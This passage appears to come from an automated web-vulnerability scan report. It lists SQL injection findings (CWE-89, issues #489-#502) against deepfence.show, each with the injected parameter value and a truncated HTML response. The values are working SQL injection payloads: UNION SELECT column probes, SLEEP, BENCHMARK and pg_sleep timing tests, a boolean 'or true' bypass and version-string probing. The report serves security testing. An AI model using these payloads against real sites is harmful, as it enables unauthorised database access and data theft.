icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #489\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #490\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(\n88)+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #491\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io -1 UNION SELECT 1 INTO @,@,@\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #492\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK\n(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #493\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io-- -\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #494\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 15#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #495\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #496\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #497\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #498\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io') or true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #499Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1 or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #500\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io and (select substring(@@version,3,1))='X'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #501\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io -1 UNION SELECT 1 INTO @,@\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #502\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 